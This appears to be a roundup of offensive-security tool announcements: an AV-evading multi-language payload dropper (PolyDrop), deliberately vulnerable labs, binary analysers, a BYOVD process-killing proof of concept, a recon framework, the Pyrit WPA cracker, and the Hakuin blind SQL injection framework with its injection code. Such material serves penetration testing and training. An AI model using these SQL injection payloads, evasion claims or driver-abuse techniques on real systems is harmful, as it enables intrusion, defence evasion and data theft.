
PolyDrop - A BYOSI (Bring-Your-Own-Script-Interpreter) Rapid Payload Deployment Toolkit

By: Zion3R — September 23rd 2024 at 11:30


BYOSI

- Bring-Your-Own-Script-Interpreter

- By abusing trusted applications, one can deliver a compatible script interpreter for a Windows, Mac, or Linux system along with malicious source code written for that chosen interpreter. Once both the malicious source code and the trusted script interpreter are safely written to the target system, one can simply execute said source code via the trusted script interpreter.

PolyDrop

- Leverages thirteen scripting languages to perform the above attack.


The following languages are wholly ignored by AV vendors, including MS-Defender:

  • tcl
  • php
  • crystal
  • julia
  • golang
  • dart
  • dlang
  • vlang
  • nodejs
  • bun
  • python
  • fsharp
  • deno

MS-Defender allowed all of these languages to fully execute and establish a reverse shell. We assume the list is even longer, given that languages such as PHP are considered "dead" languages.

- Currently undetectable by most mainstream Endpoint-Detection & Response vendors.

The total number of vendors that are unable to scan or process just PHP file types is 14, and they are listed below:

  • Alibaba
  • Avast-Mobile
  • BitDefenderFalx
  • Cylance
  • DeepInstinct
  • Elastic
  • McAfee Scanner
  • Palo Alto Networks
  • SecureAge
  • SentinelOne (Static ML)
  • Symantec Mobile Insight
  • Trapmine
  • Trustlook
  • Webroot

And the total number of vendors that are unable to accurately identify malicious PHP scripts is 54, and they are listed below:

  • Acronis (Static ML)
  • AhnLab-V3
  • ALYac
  • Antiy-AVL
  • Arcabit
  • Avira (no cloud)
  • Baidu
  • BitDefender
  • BitDefenderTheta
  • ClamAV
  • CMC
  • CrowdStrike Falcon
  • Cybereason
  • Cynet
  • DrWeb
  • Emsisoft
  • eScan
  • ESET-NOD32
  • Fortinet
  • GData
  • Gridinsoft (no cloud)
  • Jiangmin
  • K7AntiVirus
  • K7GW
  • Kaspersky
  • Lionic
  • Malwarebytes
  • MAX
  • MaxSecure
  • NANO-Antivirus
  • Panda
  • QuickHeal
  • Sangfor Engine Zero
  • Skyhigh (SWG)
  • Sophos
  • SUPERAntiSpyware
  • Symantec
  • TACHYON
  • TEHTRIS
  • Tencent
  • Trellix (ENS)
  • Trellix (HX)
  • TrendMicro
  • TrendMicro-HouseCall
  • Varist
  • VBA32
  • VIPRE
  • VirIT
  • ViRobot
  • WithSecure
  • Xcitium
  • Yandex
  • Zillya
  • ZoneAlarm by Check Point
  • Zoner

With this in mind, and given these absolute shortcomings in identifying PHP-based malware, we came up with the theory that the 13 identified languages are also an oversight by these vendors, including CrowdStrike, SentinelOne, Palo Alto, Fortinet, etc. We have been able to identify that, at the very least, Defender considers these obviously malicious payloads as plaintext.

Disclaimer

We, as the maintainers, are in no way responsible for the misuse or abuse of this product. This was published for legitimate penetration testing/red teaming purposes and for educational value. Know the applicable laws in your country of residence before using this script, and do not break the law whilst using this. Thank you and have a nice day.

EDIT

In case you are seeing all of the default declarations and wondering why: there is a reason. This was built to be more modular for later versions. For now, enjoy the tool and feel free to post issues; they'll be addressed as quickly as possible.




Damn-Vulnerable-Drone - An Intentionally Vulnerable Drone Hacking Simulator Based On The Popular ArduPilot/MAVLink Architecture, Providing A Realistic Environment For Hands-On Drone Hacking

By: Zion3R — September 21st 2024 at 11:30


The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking.


    About the Damn Vulnerable Drone


    What is the Damn Vulnerable Drone?

    The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems.

    Why was it built?

    The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts.

    Similar to how pilots utilize flight simulators for training, we can use the Damn Vulnerable Drone simulator to gain in-depth knowledge of real-world drone systems, understand their vulnerabilities, and learn effective methods to exploit them.

    The Damn Vulnerable Drone platform is open-source and available at no cost and was specifically designed to address the substantial expenses often linked with drone hardware, hacking tools, and maintenance. Its cost-free nature allows users to immerse themselves in drone hacking without financial concerns. This accessibility makes the Damn Vulnerable Drone a crucial resource for those in the fields of information security and penetration testing, promoting the development of offensive cybersecurity skills in a safe environment.

    How does it work?

    The Damn Vulnerable Drone platform operates on the principle of Software-in-the-Loop (SITL), a simulation technique that allows users to run drone software as if it were executing on an actual drone, thereby replicating authentic drone behaviors and responses.

    ArduPilot's SITL allows for the execution of the drone's firmware within a virtual environment, mimicking the behavior of a real drone without the need for physical hardware. This simulation is further enhanced with Gazebo, a dynamic 3D robotics simulator, which provides a realistic environment and physics engine for the drone to interact with. Together, ArduPilot's SITL and Gazebo lay the foundation for a sophisticated and authentic drone simulation experience.

    While the current Damn Vulnerable Drone setup doesn't mirror every drone architecture or configuration, the integrated tactics, techniques and scenarios are broadly applicable across various drone systems, models and communication protocols.
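
    To get a feel for how a ground station talks to the simulated flight controller, the short sketch below uses pymavlink to read the SITL telemetry stream. It is only an illustration: it assumes the simulator exposes MAVLink on UDP port 14550 (the common SITL/GCS default), so the endpoint may need adjusting to match your lab setup.

    from pymavlink import mavutil

    # Connect to the simulated drone's MAVLink telemetry stream (assumed endpoint).
    conn = mavutil.mavlink_connection('udp:127.0.0.1:14550')

    # Wait for a heartbeat so we know the simulated flight controller is alive.
    conn.wait_heartbeat()
    print(f'Heartbeat from system {conn.target_system}, component {conn.target_component}')

    # Read a few position reports to confirm telemetry is flowing.
    for _ in range(5):
        msg = conn.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=10)
        if msg:
            print(f'lat={msg.lat / 1e7:.6f} lon={msg.lon / 1e7:.6f} alt={msg.alt / 1000:.1f} m')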

    Features

    • Docker-based Environment: Runs in a completely virtualized docker-based setup, making it accessible and safe for drone hacking experimentation.
    • Simulated Wireless Networking: Simulated Wi-Fi (802.11) interfaces to practice wireless drone attacks.
    • Onboard Camera Streaming & Gimbal: Simulated RTSP drone onboard camera stream with gimbal and companion computer integration.
    • Companion Computer Web Interface: Companion Computer configuration management via web interface and simulated serial connection to Flight Controller.
    • QGroundControl/MAVProxy Integration: One-click QGroundControl UI launching (only supported on x86 architecture) with MAVProxy GCS integration.
    • MAVLink Router Integration: Telemetry forwarding via MAVLink Router on the Companion Computer Web Interface.
    • Dynamic Flight Logging: Fully dynamic ArduPilot flight bin logs stored on a simulated SD Card.
    • Management Web Console: Simple to use simulator management web console used to trigger scenarios and drone flight states.
    • Comprehensive Hacking Scenarios: Ideal for practicing a wide range of drone hacking techniques, from basic reconnaissance to advanced exploitation.
    • Detailed Walkthroughs: If you need help hacking against a particular scenario you can leverage the detailed walkthrough documentation as a spoiler.



    VulnNodeApp - A Vulnerable Node.Js Application

    By: Zion3R — June 23rd 2024 at 12:30


    A vulnerable application built with Node.js, the Express server, and the EJS template engine. This application is meant for educational purposes only.


    Setup

    Clone this repository

    git clone https://github.com/4auvar/VulnNodeApp.git

    Application setup:

    • Install the latest node.js version with npm.
    • Open terminal/command prompt and navigate to the location of downloaded/cloned repository.
    • Run command: npm install

    DB setup

    • Install and configure the latest MySQL version and start the MySQL service/daemon
    • Log in to MySQL as the root user and run the SQL script below:
    CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
    create database vuln_node_app_db;
    GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
    USE vuln_node_app_db;
    create table users (id int AUTO_INCREMENT PRIMARY KEY, fullname varchar(255), username varchar(255),password varchar(255), email varchar(255), phone varchar(255), profilepic varchar(255));
    insert into users(fullname,username,password,email,phone) values("test1","test1","test1","test1@test.com","976543210");
    insert into users(fullname,username,password,email,phone) values("test2","test2","test2","test2@test.com","9887987541");
    insert into users(fullname,username,password,email,phone) values("test3","test3","test3","test3@test.com","9876987611");
    insert into users(fullname,username,password,email,phone) values("test4","test4","test4","test4@test.com","9123459876");
    insert into users(fullname,username,password,email,phone) values("test5","test5","test 5","test5@test.com","7893451230");

    Set basic environment variables

    • The user needs to set the environment variables below (a quick sanity-check sketch follows the list).
      • DATABASE_HOST (E.g: localhost, 127.0.0.1, etc...)
      • DATABASE_NAME (E.g: vuln_node_app_db or DB name you change in above DB script)
      • DATABASE_USER (E.g: vulnnodeapp or user name you change in above DB script)
      • DATABASE_PASS (E.g: password or password you change in above DB script)
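
    A minimal Python sketch (a hypothetical helper, not part of the project) to confirm those variables are set before starting the server:

    import os
    import sys

    # The four variables the application expects, per the list above.
    required = ["DATABASE_HOST", "DATABASE_NAME", "DATABASE_USER", "DATABASE_PASS"]

    missing = [name for name in required if not os.environ.get(name)]
    if missing:
        sys.exit(f"Missing environment variables: {', '.join(missing)}")
    print("All database environment variables are set; you can run `npm start`.")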

    Start the server

    • Open the command prompt/terminal and navigate to the location of your repository
    • Run command: npm start
    • Access the application at http://localhost:3000

    Vulnerabilities covered

    • SQL Injection
    • Cross Site Scripting (XSS)
    • Insecure Direct Object Reference (IDOR)
    • Command Injection
    • Arbitrary File Retrieval
    • Regular Expression Injection
    • External XML Entity Injection (XXE)
    • Node.js Deserialization
    • Security Misconfiguration
    • Insecure Session Management

    TODO

    • Will add new vulnerabilities such as CORS, Template Injection, etc...
    • Improve application documentation

    Issues

    • In case of bugs in the application, feel free to create an issue on GitHub.

    Contribution

    • Feel free to create a pull request for any contribution.

    You can reach out to me at @4auvar




    XMGoat - Composed of XM Cyber terraform templates that help you learn about common Azure security issues

    By: Zion3R — June 22nd 2024 at 12:30


    XM Goat is composed of XM Cyber Terraform templates that help you learn about common Azure security issues. Each template is a vulnerable environment with some significant misconfigurations. Your job is to attack and compromise the environments.

    Here's what to do for each environment:

    1. Run installation and then get started.

    2. With the initial user and service principal credentials, attack the environment based on the scenario flow (for example, XMGoat/scenarios/scenario_1/scenario1_flow.png).

    3. If you need help with your attack, refer to the solution (for example, XMGoat/scenarios/scenario_1/solution.md).

    4. When you're done learning the attack, clean up.


    Requirements

    • Azure tenant
    • Terraform version 1.0.9 or above
    • Azure CLI
    • Azure User with Owner permissions on Subscription and Global Admin privileges in AAD

    Installation

    Run these commands:

    $ az login
    $ git clone https://github.com/XMCyber/XMGoat.git
    $ cd XMGoat
    $ cd scenarios
    $ cd scenario_<SCENARIO>

    Where <SCENARIO> is the scenario number you want to complete

    $ terraform init
    $ terraform plan -out <FILENAME>
    $ terraform apply <FILENAME>

    Where <FILENAME> is the name of the output file

    Get started

    To get the initial user and service principal credentials, run the following query:

    $ terraform output --json

    For Service Principals, use application_id.value and application_secret.value.

    For Users, use username.value and password.value.
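
    If you prefer to pull these values programmatically, the small sketch below (an illustration only, assuming Terraform is on your PATH and you are inside the scenario directory) parses the JSON output using the output names mentioned above:

    import json
    import subprocess

    # Run `terraform output --json` and parse the result.
    raw = subprocess.run(
        ["terraform", "output", "--json"],
        capture_output=True, text=True, check=True,
    ).stdout
    outputs = json.loads(raw)

    # Service principal credentials.
    app_id = outputs["application_id"]["value"]
    app_secret = outputs["application_secret"]["value"]

    # Initial user credentials.
    username = outputs["username"]["value"]
    password = outputs["password"]["value"]

    print(f"SP: {app_id} / {app_secret}")
    print(f"User: {username} / {password}")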

    Cleaning up

    After completing the scenario, run the following commands in order to clean up all the resources created in your tenant:

    $ az login
    $ cd XMGoat
    $ cd scenarios
    $ cd scenario_<SCENARIO>

    Where <SCENARIO> is the scenario number you want to clean up

    $ terraform destroy



    Extrude - Analyse Binaries For Missing Security Features, Information Disclosure And More...

    By: Zion3R — June 21st 2024 at 12:30


    Analyse binaries for missing security features, information disclosure and more.

    Extrude is in the early stages of development, and currently only supports ELF and MachO binaries. PE (Windows) binaries will be supported soon.


    Usage

    Usage:
      extrude [flags] [file]

    Flags:
      -a, --all               Show details of all tests, not just those which failed.
      -w, --fail-on-warning   Exit with a non-zero status even if only warnings are discovered.
      -h, --help              help for extrude
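
    As an illustration, a small wrapper (a sketch only, assuming the extrude binary is on your PATH) can gate a CI job on the --fail-on-warning behaviour:

    import subprocess
    import sys

    def check_binary(path: str) -> bool:
        """Return True if extrude reports no failures or warnings for the binary."""
        # --fail-on-warning makes extrude exit non-zero even if only warnings are found.
        result = subprocess.run(["extrude", "--fail-on-warning", path])
        return result.returncode == 0

    if __name__ == "__main__":
        target = sys.argv[1] if len(sys.argv) > 1 else "./mybinary"  # placeholder path
        if not check_binary(target):
            sys.exit(f"{target}: missing security features detected")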

    Docker

    You can optionally run extrude with docker via:

    docker run -v `pwd`:/blah -it ghcr.io/liamg/extrude /blah/targetfile

    Supported Checks

    ELF

    • PIE
    • RELRO
    • BIND NOW
    • Fortified Source
    • Stack Canary
    • NX Stack

    MachO

    • PIE
    • Stack Canary
    • NX Stack
    • NX Heap
    • ARC

    Windows

    Coming soon...

    TODO

    • Add support for PE
    • Add secret scanning
    • Detect packers



    ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

    By: Zion3R — June 4th 2024 at 12:30


    ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


    Features

    • Identifies potential ROP gadgets in binary executables.
    • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
    • Generates exploit templates to make the exploit process faster
    • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
    • Can print function names and addresses for further analysis.
    • Supports searching for specific instruction patterns.

    Usage

    • <binary>: Path to the binary file for analysis.
    • -s, --search SEARCH: Optional. Search for specific instruction patterns.
    • -f, --functions: Optional. Print function names and addresses.

    Examples

    • Analyze a binary without searching for specific instructions:

    python3 ropdump.py /path/to/binary

    • Analyze a binary and search for specific instructions:

    python3 ropdump.py /path/to/binary -s "pop eax"

    • Analyze a binary and print function names and addresses:

    python3 ropdump.py /path/to/binary -f
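
    To run ROPDump across a whole directory of binaries, a small wrapper along these lines can help (a hypothetical helper; the directory path and the search pattern are placeholders):

    import pathlib
    import subprocess

    BINARY_DIR = pathlib.Path("/path/to/binaries")   # directory of target binaries (example path)

    for target in sorted(BINARY_DIR.iterdir()):
        if not target.is_file():
            continue
        print(f"=== {target} ===")
        # Search each binary for a common gadget pattern (same flag as the example above).
        subprocess.run(["python3", "ropdump.py", str(target), "-s", "pop eax"])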




    Reaper - Proof Of Concept On BYOVD Attack

    By: Zion3R — June 1st 2024 at 12:30


    Reaper is a proof-of-concept designed to exploit a BYOVD (Bring Your Own Vulnerable Driver) vulnerability. This malicious technique involves loading a legitimate but vulnerable driver onto a target system, which attackers can then exploit to perform malicious actions.

    Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.

    Note: Reaper does not kill the Windows Defender process, as it is protected; Reaper is a simple proof of concept.


    Features

    • Kill process
    • Suspend process

    Help

        ____
       / __ \___  ____ _____  ___  _____
      / /_/ / _ \/ __ `/ __ \/ _ \/ ___/
     / _, _/  __/ /_/ / /_/ /  __/ /
    /_/ |_|\___/\__,_/ .___/\___/_/
                    /_/

    [Coded by MrEmpy]
    [v1.0]

    Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
    Options:
    sp, suspend process
    kp, kill process

    Values:
    PROCESSID process id to suspend/kill

    Examples:
    Reaper.exe sp 1337
    Reaper.exe kp 1337

    Demonstration

    Install

    You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

    Note: The executable and driver must be in the same directory.




    Ars0N-Framework - A Modern Framework For Bug Bounty Hunting

    By: Zion3R — May 31st 2024 at 12:30



    Howdy! My name is Harrison Richardson, or rs0n (arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.


    The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make 💰 doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high-paying career in Cyber Security.

    In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this GitHub repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py or slowburn.py) is basically an algorithm that runs the Modules (Ex: fire-starter.py or fire-scanner.py) in a specific pattern for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using GitHub to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.

    My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!


    Quick Start

    Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:

    sudo apt update && sudo apt-get update
    sudo apt -y upgrade && sudo apt-get -y upgrade
    wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
    tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
    rm ars0n-framework-v0.0.2-alpha.tar.gz
    cd ars0n-framework
    ./install.sh

    Download Latest Stable ALPHA Version

    wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
    tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
    rm ars0n-framework-v0.0.2-alpha.tar.gz

    Install

    The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.

    Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.4. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.

    ./install.sh

    This video shows exactly what to expect from a successful installation.

    If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

    ./install.sh --arm

    You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.

    Run the Web Application (Client and Server)

    Once the installation is complete, you will be given the option to run the application by entering Y. If you choose not to run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directory and run the run.sh bash script.

    ./run.sh

    If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

    ./run.sh --arm

    Core Modules

    The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.

    Wildfire

    At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.

    How it works:

    1. The user adds root domains through the Graphical User Interface (GUI) that they wish to scan for hidden subdomains
    2. Wildfire sorts each of these domains based on the last time they were scanned to ensure the domain with the oldest data is scanned first
    3. Wildfire scans each of the domains using the Sub-Modules based on the flags provided by the user.

    Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.

    Also, please note that most data will not appear in the GUI until the scan has completed. It's best to try and run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has completed to move from Recon to Enumeration.

    Running Wildfire:

    Graphical User Interface (GUI)

    Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.

    Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan from the CLI.

    Command Line Interface (CLI)

    All Core Modules for The Ars0n Framework are stored in the /toolkit directory. Simply navigate to the directory and run wildfire.py with the necessary flags. At least one Sub-Module flag must be provided.

    python3 wildfire.py --start --cloud --scan

    Slowburn

    Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.

    Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.

    In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various APIs and deposits it into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.

    To initialize Slowburn, simply run the following command:

    python3 slowburn.py --initialize

    Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.

    Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.

    If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:

    python3 slowburn.py

    Sub-Modules

    The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.

    Fire-Starter

    Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.

    Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and ASNs to identify where those external entries are hosted. Currently, Fire-Starter works by chaining together the following widely used open-source tools:

    • Amass
    • Sublist3r
    • Assetfinder
    • Get All URLs (GAU)
    • Certificate Transparency Logs (CRT)
    • Subfinder
    • ShuffleDNS
    • GoSpider
    • Subdomainizer

    These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.

    Once the scan is complete, the Dashboard will be updated and available to the user.

    Most Sub-Modules in The Ars0n Framework require the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.

    Fire-Cloud

    Coming soon...

    Fire-Scanner

    Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.

    At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.

    Troubleshooting

    The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.

    It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools has its own way of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why The Ars0n Framework should only be run on a clean installation of Kali Linux.

    Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is that the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine meets the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.

    Frequently Asked Questions

    Coming soon...




    Pyrit - The Famous WPA Precomputed Cracker

    By: Zion3R — May 28th 2024 at 12:30


    Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication-phase data in a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.

    WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use, at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; these ultimately allow the password that protects the network to be revealed. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


    The author does not encourage or support using Pyrit for the infringement of people's communication privacy. The exploration and realization of the technology discussed here are a motivating purpose of their own; this is documented by the open development, strictly source-code-based distribution and 'copyleft' licensing.

    Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms, including FreeBSD, MacOS X and Linux as operating systems, and x86, alpha, arm, hppa, mips, powerpc, s390 and sparc processors.

    Attacking WPA/WPA2 by brute-force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
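
    For reference, a single PMK is derived from the passphrase and the network's SSID with PBKDF2-HMAC-SHA1 (4096 iterations, 32-byte output). A minimal Python sketch of the computation Pyrit precomputes, using illustrative values:

    import hashlib

    passphrase = b"correct horse battery staple"  # example pre-shared passphrase
    ssid = b"ExampleNetwork"                      # the SSID acts as the salt

    # PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256-bit key)
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)
    print(pmk.hex())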

    These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

    • A single storage (e.g. a MySQL-server)
    • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
    • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computational nodes, two of which actually access the RPC-interface.

    What's new

    • Fixed #479 and #481
    • Pyrit CUDA now compiles in OSX with Toolkit 7.5
    • Added use_CUDA and use_OpenCL in config file
    • Improved cores listing and managing
    • limit_ncpus now disables all CPUs when set to value <= 0
    • Improve CCMP packet identification, thanks to yannayl

    See CHANGELOG file for a better description.

    How to use

    Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

    How to participate

    You may want to read this wiki entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, please submit an issue (https://github.com/JPaulMora/Pyrit/issues).




    Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

    By: Zion3R — May 15th 2024 at 01:56


    Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

    Hakuin has been presented at esteemed academic and industrial conferences:

    • BlackHat MEA, Riyadh, 2023
    • Hack in the Box, Phuket, 2023
    • IEEE S&P Workshop on Offensive Technologies (WOOT), 2023

    More information can be found in our paper and slides.


    Installation

    To install Hakuin, simply run:

    pip3 install hakuin

    Developers should install the package locally and set the -e flag for editable mode:

    git clone git@github.com:pruzko/hakuin.git
    cd hakuin
    pip3 install -e .

    Examples

    Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from Requester and override the request method. The method must also determine whether the query resolved to True or False.

    Example 1 - Query Parameter Injection with Status-based Inference

    import aiohttp
    from hakuin import Requester

    class StatusRequester(Requester):
        async def request(self, ctx, query):
            r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
            return r.status == 200
    Example 2 - Header Injection with Content-based Inference

    class ContentRequester(Requester):
        async def request(self, ctx, query):
            headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
            r = await aiohttp.get(f'http://vuln.com/', headers=headers)
            return 'found' in await r.text()

    To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

    Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL

    import asyncio
    from hakuin import Extractor, Requester
    from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

    class StatusRequester(Requester):
        ...

    async def main():
        # requester: Use this Requester
        # dbms:      Use this DBMS
        # n_tasks:   Spawns N tasks that extract column rows in parallel
        ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
        ...

    if __name__ == '__main__':
        asyncio.get_event_loop().run_until_complete(main())

    Now that everything is set, you can start extracting DB metadata.

    Example 1 - Extracting DB Schemas

    # strategy:
    #   'binary': Use binary search
    #   'model':  Use pre-trained model
    schema_names = await ext.extract_schema_names(strategy='model')

    Example 2 - Extracting Tables

    tables = await ext.extract_table_names(strategy='model')

    Example 3 - Extracting Columns

    columns = await ext.extract_column_names(table='users', strategy='model')

    Example 4 - Extracting Tables and Columns Together

    metadata = await ext.extract_meta(strategy='model')

    Once you know the structure, you can extract the actual content.

    Example 1 - Extracting Generic Columns

    # text_strategy: Use this strategy if the column is text
    res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')

    Example 2 - Extracting Textual Columns

    # strategy:
    #   'binary':   Use binary search
    #   'fivegram': Use five-gram model
    #   'unigram':  Use unigram model
    #   'dynamic':  Dynamically identify the best strategy. This setting
    #               also enables opportunistic guessing.
    res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')

    Example 3 - Extracting Integer Columns

    res = await ext.extract_column_int(table='users', column='id')

    Example 4 - Extracting Float Columns

    res = await ext.extract_column_float(table='products', column='price')

    Example 5 - Extracting Blob (Binary Data) Columns

    res = await ext.extract_column_blob(table='users', column='id')

